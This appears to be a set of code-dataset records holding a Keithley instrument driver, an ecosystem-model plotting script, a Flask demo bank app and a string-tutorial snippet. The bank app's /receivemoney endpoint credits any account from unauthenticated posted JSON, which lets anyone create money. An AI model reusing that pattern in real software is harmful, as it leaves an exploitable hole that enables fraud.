KEITHLEY source-measure unit (SCPI over VISA)\nfrom colorama import init, Fore, Back\ninit(autoreset=True) # convert termcolor output for Windows consoles\n\nfrom os.path import basename as bs\nmdlname = bs(__file__).split('.')[0] # model's name e.g. ESG, PSG, AWG, VSA, ADC\ndebugger = 'debug' + mdlname\n\nimport pyvisa as visa\nfrom functools import wraps\nfrom time import sleep, time\nfrom contextlib import suppress\nfrom pyqum.instrument.logger import address, set_status, status_code\nfrom pyqum.instrument.toolbox import waveform\n\ndef debug(state=False):\n    exec('%s %s; %s = %s' %('global', debugger, debugger, 'state'), globals(), locals()) # open global and local both-ways channels!\n    if state:\n        print(Back.RED + '%s: Debugging Mode' %debugger.replace('debug', ''))\n    return\n\ndebug() # declare the debugger mode here\n\n# INITIALIZATION\ndef Initiate(reset=False, which=1):\n    ad = address()\n    rs = ad.lookup(mdlname, which) # Instrument's Address\n    rm = visa.ResourceManager()\n    try:\n        bench = rm.open_resource(rs) #establishing connection using GPIB# with the machine\n        if reset:\n            stat = bench.write('RC') #Clear buffer memory\n        else:\n            stat = bench.write(':SYSTem:PRESet')\n        bench.read_termination = '\\n' #omit termination tag from output \n        bench.timeout = 15000 #set timeout in ms\n        set_status(mdlname, dict(state='connected'))\n        print(Fore.GREEN + \"%s's connection Initialized: %s\" % (mdlname, str(stat)))\n        ad.update_machine(1, \"%s_%s\"%(mdlname,which))\n    except: \n        # raise\n        set_status(mdlname, dict(state='DISCONNECTED'))\n        print(Fore.RED + \"%s's connection NOT FOUND\" % mdlname)\n        bench = \"disconnected\"  # keep the return value defined when the connection fails\n    return bench\n\ndef single_pulse(bench, width, height):\n    '''width in seconds, height in volts\n    ON: 20ms, OFF: 50ms\n    '''\n    # set compliances\n    Compliance = 0.200 #0.08\n    bench.write(\":SENS:CURR:PROT %s\"%Compliance)\n    bench.write(\":SENS:CURR:RANGe %s\"%Compliance)\n\n    # set range\n    # bench.write(\":SENS:VOLT:RANGe %s\" %height)\n    \n    # pulse sequence\n    bench.write(\":SOUR:LIST:VOLT 0,%s,0\" %height)\n    bench.write(\":TRIG:COUN 3\")\n    bench.write(\":SOUR:DEL %s\" %width)\n\n    return_width = float(bench.query(\"SOUR:DEL?\"))\n    bench.write(\":SOUR:VOLT:MODE LIST\")\n    bench.write(\":OUTPUT ON\")\n\n    bench.write(\":FORMAT:ELEM VOLT,CURR\")\n    VI_List = [float(x) for x in bench.query(\":READ?\").split(',')]\n    \n    return return_width, VI_List\n\n\ndef close(bench, reset=False, which=1):\n    bench.write(\":OUTPUT OFF\")\n    if reset:\n        bench.write(':SYSTem:PRESet')\n        set_status(mdlname, dict(config='return to zero-off'))\n    else: set_status(mdlname, dict(config='previous'))\n    try:\n        bench.close()  # pyvisa returns None on a successful close\n        status = \"Success\"\n        ad = address()\n        ad.update_machine(0, \"%s_%s\"%(mdlname,which))\n    except: status = \"Error\"\n    set_status(mdlname, dict(state='disconnected'))\n    print(Back.WHITE + Fore.BLACK + \"%s's connection Closed\" %(mdlname))\n    return status\n    \n\n# Test Zone\ndef test(detail=True):\n    debug(detail)\n    print(Back.WHITE + Fore.MAGENTA + \"Debugger mode: %s\" %eval(debugger))\n    s = Initiate()\n    if eval(debugger):\n        stat = single_pulse(s, 0.02, 10)\n        print(\"KEITHLEY READ: %s\" %stat)\n    else: print(Fore.RED + \"Basic IO Test\")\n    close(s, True)\n    return\n\n# test()\n","sub_path":"TEST/FACE/pyqum/instrument/machine/KEIT.py","file_name":"KEIT.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"130206182","text":"#!/usr/bin/env python\n# coding: 
utf-8\n\n#***********************************************************************\n# plot_meanannuals.py\n# Plots mean annual values of VOM simulations and simulations of Whitley et al. (2016). \n# \n#-----------------------------------------------------------------------\n# Authors: Remko Nijzink\n# Now at: LIST (Luxembourg Institute of Science and Technology)\n#-----------------------------------------------------------------------\n#\n# Copyright (C) 2020 LIST (Luxembourg Institute of Science and Technology), all right reserved.\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#***********************************************************************\n\n\n\nimport os\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom datetime import datetime, timedelta, date\nfrom matplotlib.pyplot import imread\nimport matplotlib.cbook as cbook\nfrom netCDF4 import Dataset\nimport argparse\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Plots mean annual values of VOM simulations and simulations of Whitley et al. (2016).\")\n\n parser.add_argument(\"-o\", \"--outfile\", help=\"outputfile with plot\")\n parser.add_argument(\"--vom\", help=\"VOM results\", nargs='+')\n parser.add_argument(\"--bess\", help=\"bess input files\", nargs='+')\n parser.add_argument(\"--bios2\", help=\"bios2 input files\", nargs='+')\n parser.add_argument(\"--lpjguess\", help=\"lpj-guess input files, first all files with et, second gpp\", nargs='+')\n parser.add_argument(\"--maespa\", help=\"maespa input files\", nargs='+')\n parser.add_argument(\"--spa\", help=\"spa input files\", nargs='+')\n parser.add_argument(\"--cable\", help=\"cable input files\", nargs='+')\n parser.add_argument(\"--sites\", help=\"study sites, should correspond to the number and order of inputfiles\", nargs='+')\n parser.add_argument(\"--whitley_sites\", help=\"mask the study sites that are also used in Whitley et al.\",nargs='+', type=int )\n parser.add_argument(\"--dingo_et\", help=\"DINGO files evaporation\", nargs='+')\n parser.add_argument(\"--dingo_gpp\", help=\"DINGO files assimilation\", nargs='+')\n parser.add_argument(\"--i2015\", help=\"results_daily AoB2015 \")\n parser.add_argument(\"--sharex\", help=\"share x-axis \", type=bool, default = True)\n parser.add_argument(\"--figsize\", help=\"figure size\", nargs='+', type=float, default = [15,7] )\n\n args = parser.parse_args()\n\n ###################################\n #some constants for conversions\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 997 #[kg/m3]\n\n ###################################\n #read in data from Whitley et al. 
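\n    # Conversion check (an added sketch based on the constants above): an ET flux in\n    # W m-2 equals mm/day * rho_w * lat_heat_vapor * 1e6 * 1e-3 / 86400, i.e. about\n    # 26 W m-2 per mm/day, so 100 W m-2 ~= 3.8 mm/day. The read_* helpers below\n    # apply the same factors in reverse.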
\n whitley_sites = np.array(args.sites)[np.array(args.whitley_sites)==1]\n\n bess_assma = dict()\n bess_ema = dict()\n bios2_assma = dict()\n bios2_ema = dict()\n lpjguess_assma = dict()\n lpjguess_ema = dict()\n maespa_assma = dict()\n maespa_ema = dict()\n spa_assma = dict()\n spa_ema = dict()\n cable_assma = dict()\n cable_ema = dict()\n\n for i in range(0, len(whitley_sites)):\n #read in data from BESS\n evap_tmp, ass_tmp = read_bess(args.bess[i])\n\n bess_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n bess_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from BIOS2\n evap_tmp, ass_tmp = read_bios2(args.bios2[i])\n bios2_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n bios2_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from LPJ-GUESS, ET in W/m2, GPP in umol/m2/s\n evap_tmp, ass_tmp = read_lpjguess(args.lpjguess[i], args.lpjguess[i+len(whitley_sites)])\n lpjguess_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n lpjguess_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from MAESPA, ET in W m-2, GPP in umol m-2 s-1\n evap_tmp, ass_tmp = read_maespa(args.maespa[i])\n maespa_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n maespa_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from SPA, ET in W m-2, GPP in mmol m-2 s-1\n evap_tmp, ass_tmp = read_spa(args.spa[i])\n spa_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n spa_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n #read in data from CABLE, ET in kg/m^2/s, GPP in umol/m^2/s\n evap_tmp, ass_tmp = read_cable(args.cable[i])\n cable_ema[whitley_sites[i]] = np.mean( evap_tmp.resample(\"A\").sum() )\n cable_assma[whitley_sites[i]] = np.mean( ass_tmp.resample(\"A\").sum() )\n\n ####################################################\n #load other data \n\n dingo_evap = dict()\n dingo_gpp = dict()\n vom_evap = dict()\n vom_gpp = dict()\n for i in range(0, len(args.sites)):\n ea_tmp = np.loadtxt(args.dingo_et[i], usecols=2) #mm/d\n le_tmp = ea_tmp * lat_heat_vapor * rho_w * 1000/(3600*24) \n le_time = np.genfromtxt(args.dingo_et[i],usecols=0, dtype=np.str )#mm/d\n le_time = pd.date_range(le_time[0], le_time[-1], freq='D') \n e_pd = pd.Series(ea_tmp, index = le_time) \n\n gpp_tmp = np.loadtxt(args.dingo_gpp[i], usecols=2) #mm/d\n gpp_obs = -1000000*gpp_tmp/ (3600*24)\n gpp_time = np.genfromtxt(args.dingo_gpp[i],usecols=0, dtype=np.str )#mm/d\n gpp_time= pd.date_range(gpp_time[0], gpp_time[-1], freq='D') \n gpp_pd = pd.Series(-gpp_tmp, index = gpp_time) \n\n dingo_evap[args.sites[i]] = np.mean( e_pd.resample(\"A\").sum() )\n dingo_gpp[args.sites[i]] = np.mean( gpp_pd.resample(\"A\").sum() )\n\n vom_tmp = np.genfromtxt(args.vom[i], names=True)\n etot = (vom_tmp[\"esoil\"] + vom_tmp[\"etmt\"] + vom_tmp[\"etmg\"])*1000\n letot= etot[-3650:]* lat_heat_vapor * rho_w * 1000 * 1000/(3600*24)\n #gpptot = 1000000*(vom_tmp[\"assg\"] + vom_tmp[\"asst\"] )/ (3600*24)\n gpptot = vom_tmp[\"assg\"] + vom_tmp[\"asst\"]\n\n time = pd.date_range(datetime(int(vom_tmp[\"fyear\"][3]),int(vom_tmp[\"fmonth\"][0]),int(vom_tmp[\"fday\"][0])), \n datetime(int(vom_tmp[\"fyear\"][-1]),int(vom_tmp[\"fmonth\"][-1]),int(vom_tmp[\"fday\"][-1])), \n freq='D')\n\n\n emod_pd = pd.Series(etot[-3650:], index = time[-3650:] )\n assmod_pd = pd.Series(gpptot[-3650:], index = time[-3650:] )\n\n vom_evap[args.sites[i]] = 
np.mean( emod_pd.resample(\"A\").sum() )\n vom_gpp[args.sites[i]] = np.mean( assmod_pd.resample(\"A\").sum() )\n \n\n\n\n ####################################################\n #start plotting\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(args.figsize[0], args.figsize[1]), sharex=False,gridspec_kw = {'wspace':0.2, 'hspace':-0.3} )\n ax = axes.flat\n\n ax[0].set_axisbelow(True)\n ax[0].grid(color='gray', linestyle='dashed')\n ax[1].set_axisbelow(True)\n ax[1].grid(color='gray', linestyle='dashed')\n\n iplot = 0\n #loop over study sites\n for isite in range(0, len(args.sites)): \n\n #ensemble years from Whitley\n try:\n ax[0].scatter(isite, bess_ema[args.sites[isite]],color=\"purple\")\n ax[0].scatter(isite, bios2_ema[args.sites[isite]],color=\"lightgreen\")\n ax[0].scatter(isite, cable_ema[args.sites[isite]],color=\"red\")\n ax[0].scatter(isite, maespa_ema[args.sites[isite]],color=\"gold\")\n ax[0].scatter(isite, spa_ema[args.sites[isite]],color=\"pink\")\n ax[0].scatter(isite, lpjguess_ema[args.sites[isite]],color=\"lightblue\")\n\n if( isite == 0):\n ax[1].scatter(isite, bess_assma[args.sites[isite]],color=\"purple\", label = \"BESS\")\n ax[1].scatter(isite, bios2_assma[args.sites[isite]],color=\"lightgreen\", label = \"BIOS2\")\n ax[1].scatter(isite, cable_assma[args.sites[isite]],color=\"red\", label = \"CABLE\")\n ax[1].scatter(isite, maespa_assma[args.sites[isite]],color=\"gold\", label = \"MAESPA\")\n ax[1].scatter(isite, spa_assma[args.sites[isite]],color=\"pink\", label = \"SPA\")\n ax[1].scatter(isite, lpjguess_assma[args.sites[isite]],color=\"lightblue\", label = \"LPJ-GUESS\")\n else:\n ax[1].scatter(isite, bess_assma[args.sites[isite]],color=\"purple\")\n ax[1].scatter(isite, bios2_assma[args.sites[isite]],color=\"lightgreen\")\n ax[1].scatter(isite, cable_assma[args.sites[isite]],color=\"red\")\n ax[1].scatter(isite, maespa_assma[args.sites[isite]],color=\"gold\")\n ax[1].scatter(isite, spa_assma[args.sites[isite]],color=\"pink\")\n ax[1].scatter(isite, lpjguess_assma[args.sites[isite]],color=\"lightblue\")\n \n except KeyError:\n print(\"Litchfield\")\n\n\n if( isite == 0):\n ax[0].scatter(isite, vom_evap[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\" )\n ax[0].scatter(isite, dingo_evap[args.sites[isite]],color=\"black\", s=75, marker= \"*\" )\n\n ax[1].scatter(isite, vom_gpp[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\", label = \"VOM\" )\n ax[1].scatter(isite, dingo_gpp[args.sites[isite]],color=\"black\", s=75, marker= \"*\", label = \"Obs.\" )\n else:\n ax[0].scatter(isite, vom_evap[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\")\n ax[0].scatter(isite, dingo_evap[args.sites[isite]],color=\"black\", s=75, marker= \"*\" )\n\n ax[1].scatter(isite, vom_gpp[args.sites[isite]], color=\"darkgreen\", s=75, marker= \"s\" )\n ax[1].scatter(isite, dingo_gpp[args.sites[isite]],color=\"black\", s=75, marker= \"*\" )\n\n\n\n\n\n\n #ax[iplot].set_ylim([ 0, 180 ])\n ax[0].set_xlim([ -1, 6 ]) \n #ax[iplot].set_aspect(0.8)\n ax[0].set_ylabel(r'LE (W/m$^2$) ', size=18 )\n \n #ax[iplot].set_yticks(range(0,200,20))\n #ax[iplot].set_yticklabels(range(0,200,20))\n\n ax[0].set_xticks(range(0,7))\n ax[0].set_xticklabels( ('Howard Springs', 'Litchfield', 'Adelaide River', 'Daly Uncleared', 'Dry River', \"Sturt Plains\"),rotation=90, fontsize=18) \n ax[0].set_ylabel(r'Evaporation [mm/year]', fontsize=18)\n\n\n ax[1].set_ylabel(r'Assimilation [mol/m$^2$/year]', fontsize=18)\n ax[1].set_xlim([ -1, 6 ]) \n ax[1].set_xticks(range(0,7))\n 
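# NOTE: the tick labels below are hard-coded; --sites must list these six stations in this order\n    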
ax[1].set_xticklabels( ('Howard Springs', 'Litchfield', 'Adelaide River', 'Daly Uncleared', 'Dry River', \"Sturt Plains\"),rotation=90, fontsize=18) \n\n\n plt.legend(bbox_to_anchor=(1, 1)) \n plt.tight_layout()\n #plt.savefig(\"../data/img/4_fitness.png\", bbox_inches = \"tight\")\n plt.show()\n\n\n\ndef read_bess(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\") \n time = pd.date_range(\"01-01-2000\", periods = len(data[:,0]), freq='D')\n\n tmp = 24*60*60*data[:,1] /( lat_heat_vapor * rho_w * 1000 )\n\n #make pandas series and return daily values\n evap_pd = pd.Series(tmp, index = time ) #mm/day\n ass_pd = pd.Series(data[:,1]*24*60*60*10**-6, index = time ) #umol/m2/d\n\n return evap_pd, ass_pd\n\ndef read_bios2(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\") \n time = pd.date_range(datetime(int(data[0,0]),int(data[0,1]),int(data[0,2])), \n datetime(int(data[-1,0]),int(data[-1,1]),int(data[-1,2])),freq='D')\n\n tmp = 24*60*60*data[:,3] /( lat_heat_vapor * rho_w * 1000 )\n\n #make pandas series and return daily values\n ass_pd = pd.Series(data[:,4]*24*60*60*10**-6, index = time ) #mm/day\n evap_pd = pd.Series(tmp, index = time ) \n\n return evap_pd, ass_pd\n\ndef read_lpjguess(infile_et, infile_gpp):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data_et = np.loadtxt(infile_et, skiprows=1, usecols=3)\n data_gpp = np.loadtxt(infile_gpp, skiprows=1, usecols=3)\n time_tmp = np.loadtxt(infile_gpp, skiprows=1)\n time = pd.date_range(datetime(int(time_tmp[0,0]),int(time_tmp[0,1]),int(time_tmp[0,2])), \n datetime(int(time_tmp[-1,0]),int(time_tmp[-1,1]),int(time_tmp[-1,2])),freq='D')\n\n tmp = 24*60*60*data_et /( lat_heat_vapor * rho_w * 1000 )\n\n #make pandas series and return daily values\n evap_pd = pd.Series(tmp, index = time ) #mm/day\n ass_pd = pd.Series(data_gpp*24*60*60*10**-6, index = time ) \n\n return evap_pd, ass_pd\n\ndef read_maespa(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\", skiprows=3, usecols=(3,6))\n data[data == -9999.9] = np.nan\n data[data == -999] = np.nan\n time_tmp = np.loadtxt(infile, delimiter=\",\", dtype=np.str, skiprows=3, usecols=0)\n time = pd.date_range(time_tmp[0], time_tmp[-1],freq='30min')\n\n tmp = 30*60*data[:,1] /( lat_heat_vapor * rho_w * 1000 )\n\n evap_pd = pd.Series(tmp, index = time ) #mm/30min\n ass_pd = pd.Series(data[:,0]*30*60*10**-6, index = time ) \n\n return evap_pd, ass_pd\n\ndef read_spa(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\", skiprows=1, usecols=(1,3))\n time_tmp = np.loadtxt(infile, delimiter=\",\", dtype=np.str, skiprows=1, usecols=0)\n time = pd.date_range(time_tmp[0], time_tmp[-1],freq='30min')\n\n tmp = 30*60*data[:,1] /( lat_heat_vapor * rho_w * 1000 )\n\n evap_pd = pd.Series(tmp, index = time ) #mm/30min\n ass_pd = pd.Series(-1.0*data[:,0]*30*60*10**-6, index = time ) #mol/m2/s\n\n return evap_pd, ass_pd\n\ndef read_cable(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n ncfile = Dataset(infile)\n data_gpp = np.squeeze(ncfile.variables[\"GPP\"]) # extract variable\n data_et = np.squeeze(ncfile.variables[\"Evap\"]) # extract variable\n time_tmp = np.squeeze(ncfile.variables[\"time\"]) # extract variable\n time_tmp = [pd.to_datetime(\"2007-01-01 00:01:00\") + pd.Timedelta(seconds=i) for i in time_tmp]\n time = 
pd.date_range(time_tmp[0], time_tmp[-1],freq='30min')\n\n ass_pd = pd.Series(data_gpp*30*60*10**-6, index = time ) \n evap_pd = 30*60*pd.Series(data_et, index = time ) #mm/30min\n\n return evap_pd, ass_pd\n\n\nmain()\n","sub_path":"src_py/plot_meanannuals.py","file_name":"plot_meanannuals.py","file_ext":"py","file_size_in_byte":14915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227122785","text":"from bank import app, db, bcrypt, login_manager\r\nfrom bank.forms import LoginForm, RegistrationForm, InternalTransferForm, ExternalTransferForm\r\nfrom bank.models import User, TransactionLog\r\nfrom bank.utils import decimal_check\r\nfrom flask import render_template, request, redirect, url_for, flash, jsonify\r\nfrom flask_login import login_user, current_user, login_required, logout_user\r\nfrom decimal import Decimal\r\nimport requests\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n\treturn User.query.get(user_id)\r\n\r\n\r\n@app.route(\"/logout\")\r\ndef logout():\r\n\tlogout_user()\r\n\tflash('You have successfully logged out', 'success')\r\n\treturn redirect(url_for('login'))\r\n\r\n\r\n@app.route(\"/\", methods=['GET', 'POST'])\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n\tlogin_form = LoginForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif login_form.validate_on_submit():\r\n\t\t\tuser = User.query.filter_by(email=login_form.email.data).first()\r\n\t\t\tif user and bcrypt.check_password_hash(user.password, login_form.password.data):\r\n\t\t\t\tlogin_user(user)\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\telse:\r\n\t\t\t\tflash('The email or password you entered was incorrect, please try again', 'warning')\r\n\t\t\t\treturn redirect(url_for('login'))\r\n\r\n\tcontext = {\r\n\t\t'title': 'Log in to Murasaki Bank',\r\n\t\t'login_form': login_form,\r\n\t}\r\n\treturn render_template('index.html', **context)\r\n\r\n\r\n@app.route('/signup', methods=['GET', 'POST'])\r\ndef signup():\r\n\tsignup_form = RegistrationForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif signup_form.validate_on_submit():\r\n\t\t\thash_password = bcrypt.generate_password_hash(signup_form.password.data).decode('utf-8')\r\n\t\t\tuser = User(email=signup_form.email.data, password=hash_password, first_name=signup_form.first_name.data, last_name=signup_form.last_name.data, balance=1000, admin=False,)\r\n\t\t\tdb.session.add(user)\r\n\t\t\tflash('Thank you for signing up for Murasaki Bank!', 'success')\r\n\r\n\t\t\tdb.session.commit()\r\n\t\t\treturn redirect(url_for('login'))\r\n\r\n\tcontext = {\r\n\t\t'title': 'Sign Up For Murasaki Bank',\r\n\t\t'signup_form': signup_form,\r\n\t}\r\n\treturn render_template('signup.html', **context)\r\n\r\n\r\n@app.route('/murasaki', methods=['GET', 'POST'])\r\n@login_required\r\ndef murasaki():\r\n\tinternal_transfer_form = InternalTransferForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif internal_transfer_form.validate_on_submit():\r\n\t\t\tsender = current_user\r\n\t\t\trecipient = User.query.filter_by(email=internal_transfer_form.email.data).first()\r\n\t\t\tamount = internal_transfer_form.amount.data\r\n\r\n\t\t\tif amount < 0.01: # Check if user is trying to send 0 or a negative amount\r\n\t\t\t\tflash('You must send more than $0!', 'warning')\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\tif decimal_check(amount) > 2: # Make sure user only inputs 2 decimal places\r\n\t\t\t\tflash('Please only enter 2 decimal places!', 
'warning')\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\tbalance_after_transaction = sender.balance - amount # Check if user will send more than their balance\r\n\t\t\tif balance_after_transaction <= 0:\r\n\t\t\t\tflash('You do not have enough funds for that transaction', \"warning\")\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\tsender.balance -= amount\r\n\t\t\trecipient.balance += amount\r\n\r\n\t\t\tabout_sender = \"{0} {1} <{2}>\".format(sender.first_name, sender.last_name, sender.email)\r\n\t\t\tabout_recipient = \"{0} {1} <{2}>\".format(recipient.first_name, recipient.last_name, recipient.email)\r\n\r\n\t\t\tsender_transaction_log =TransactionLog(amount=amount, from_account=about_sender, to_account=about_recipient, user_id=sender.id, positive=False)\r\n\t\t\trecipient_transaction_log =TransactionLog(amount=amount, from_account=about_sender, to_account=about_recipient, user_id=recipient.id, positive=True)\r\n\r\n\t\t\tdb.session.add(sender_transaction_log)\r\n\t\t\tdb.session.add(recipient_transaction_log)\r\n\t\t\tdb.session.commit()\r\n\t\t\tflash('You successfully sent an internal money transfer', 'success')\r\n\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\tcontext = {\r\n\t\t'user': current_user,\r\n\t\t'title': 'Welcome To Murasaki Bank',\r\n\t\t'internal_transfer': internal_transfer_form,\r\n\t\t'log': TransactionLog.query.order_by(TransactionLog.date.desc()).filter_by(user_id=current_user.id).all()\r\n\t}\r\n\treturn render_template('murasaki.html', **context)\r\n\r\n\r\n@app.route('/murasaki/admin', methods=['GET', 'POST'])\r\n@login_required\r\ndef admin():\r\n\r\n\tif current_user.admin != True:\r\n\t\tflash('You do not have proper permission to view that page!', 'danger')\r\n\t\treturn redirect(url_for('murasaki'))\r\n\r\n\tsignup_form = RegistrationForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif signup_form.validate_on_submit():\r\n\t\t\thash_password = bcrypt.generate_password_hash(signup_form.password.data).decode('utf-8')\r\n\t\t\tuser = User(email=signup_form.email.data, password=hash_password, first_name=signup_form.first_name.data, last_name=signup_form.last_name.data, balance=1000, admin=True )\r\n\t\t\tdb.session.add(user)\r\n\t\t\tflash('You created a new Admin User!', 'success')\r\n\r\n\t\t\tdb.session.commit()\r\n\t\t\treturn redirect(url_for('admin'))\r\n\r\n\tcontext = {\r\n\t\t'signup_form': signup_form,\r\n\t\t'user': current_user,\r\n\t\t'users': User.query.order_by(User.last_name).all(),\r\n\t\t'title': 'Welcome To Murasaki Bank Admin Page',\r\n\t\t'logs': TransactionLog.query.order_by(TransactionLog.date.desc()).filter_by(user_id=current_user.id).all()\r\n\t}\r\n\treturn render_template('admin.html', **context)\r\n\r\n\r\ndef my_request(transaction):\r\n\turl = 'http://127.0.0.1:5000/receivemoney?transaction='\r\n\treturn requests.post(url, json=transaction)\r\n\r\n\r\n@app.route('/sendmoney', methods=['GET', 'POST'])\r\n@login_required\r\ndef sendmoney():\r\n\r\n\texternal_transfer = ExternalTransferForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif external_transfer.validate_on_submit():\r\n\t\t\tamount = external_transfer.amount.data\r\n\r\n\t\t\tif amount < 0.01: # Check if user is trying to send 0 or a negative amount\r\n\t\t\t\tflash('You must send more than $0!', 'warning')\r\n\t\t\t\treturn redirect(url_for('sendmoney'))\r\n\r\n\t\t\tif decimal_check(amount) > 2: # Make sure user only inputs 2 decimal places\r\n\t\t\t\tflash('Please only enter 2 decimal places!', 'warning')\r\n\t\t\t\treturn 
redirect(url_for('sendmoney'))\r\n\r\n\t\t\tbalance_after_transaction = current_user.balance - amount # Check if user will send more than their balance\r\n\t\t\tif balance_after_transaction <= 0:\r\n\t\t\t\tflash('You do not have enough funds for that transaction', \"warning\")\r\n\t\t\t\treturn redirect(url_for('sendmoney'))\r\n\r\n\t\t\ttransaction = {}\r\n\t\t\ttransaction['bank'] = 'Murasaki Bank'\r\n\t\t\ttransaction['sender_name'] = \"{0} {1}\".format(current_user.first_name, current_user.last_name)\r\n\t\t\ttransaction['sender_email'] = current_user.email\r\n\t\t\ttransaction['recipient_email'] = external_transfer.email.data\r\n\t\t\ttransaction['amount'] = str(external_transfer.amount.data)\r\n\r\n\t\t\t# the partner bank's endpoint is hard-coded inside my_request() above\r\n\r\n\t\t\tr = my_request(transaction)\r\n\r\n\t\t\tif r.status_code == 200:\r\n\t\t\t\tuser_data = r.json()\r\n\r\n\t\t\t\tcurrent_user.balance -= external_transfer.amount.data\r\n\r\n\t\t\t\tabout_recipient = \"{0} <{1}> at {2}\".format(user_data['data']['recipient_name'], user_data['data']['recipient_email'], user_data['data']['bank'])\r\n\t\t\t\tabout_sender = \"{0} <{1}>\".format(transaction['sender_name'], transaction['sender_email'])\r\n\r\n\t\t\t\tsender_transaction_log = TransactionLog(amount=external_transfer.amount.data, from_account=about_sender, to_account=about_recipient, user_id=current_user.id, positive=False)\r\n\r\n\t\t\t\tdb.session.add(sender_transaction_log)\r\n\t\t\t\tdb.session.commit()\r\n\r\n\t\t\t\tflash('Successfully sent an external transfer', 'success')\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\telse:\r\n\t\t\t\tflash('Could not find user based on the email given, try again!', 'warning')\r\n\t\t\t\treturn redirect(url_for('sendmoney'))\r\n\r\n\tcontext = {\r\n\t\t'user': current_user,\r\n\t\t'external_transfer':external_transfer,\r\n\t\t'title': 'Send Money Externally',\r\n\t}\r\n\r\n\treturn render_template('external.html', **context)\r\n\r\n\r\n@app.route('/receivemoney', methods=['GET', 'POST'])\r\ndef receivemoney():\r\n\r\n\ttransaction = request.get_json(force=True)\r\n\tuser = User.query.filter_by(email=transaction['recipient_email']).first()\r\n\r\n\tif user:\r\n\t\tamount = Decimal(transaction['amount'])\r\n\t\tuser.balance += amount\r\n\r\n\t\tabout_recipient = \"{0} {1} <{2}>\".format(user.first_name, user.last_name, user.email)\r\n\t\tabout_sender = \"{0} <{1}> at {2}\".format(transaction['sender_name'], transaction['sender_email'], transaction['bank'])\r\n\t\ttransaction_log = TransactionLog(amount=amount, from_account=about_sender, to_account=about_recipient, user_id=user.id, positive=True)\r\n\r\n\t\tdb.session.add(transaction_log)\r\n\t\tdb.session.commit()\r\n\r\n\t\tuser_data = {}\r\n\t\tuser_data['recipient_name'] = \"{0} {1}\".format(user.first_name, user.last_name)\r\n\t\tuser_data['recipient_email'] = user.email\r\n\t\tuser_data['bank'] = 'Murasaki Bank'\r\n\r\n\t\treturn jsonify({'data': user_data}), 200\r\n\r\n\telse:\r\n\t\treturn jsonify({'user': 'does not exist!'}), 400","sub_path":"bank/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"364893881","text":"#-----------------------------------------\r\n# Chapter 8: string operations\r\n#-----------------------------------------\r\n# In Python, triple-quoted strings may span several lines; single-quoted strings may not!\r\n\r\nfruit = 'banana'\r\nx = list(enumerate(fruit)) # enumerate pairs each item with its index
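\r\n# expected: [(0, 'b'), (1, 'a'), (2, 'n'), (3, 'a'), (4, 'n'), (5, 'a')]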
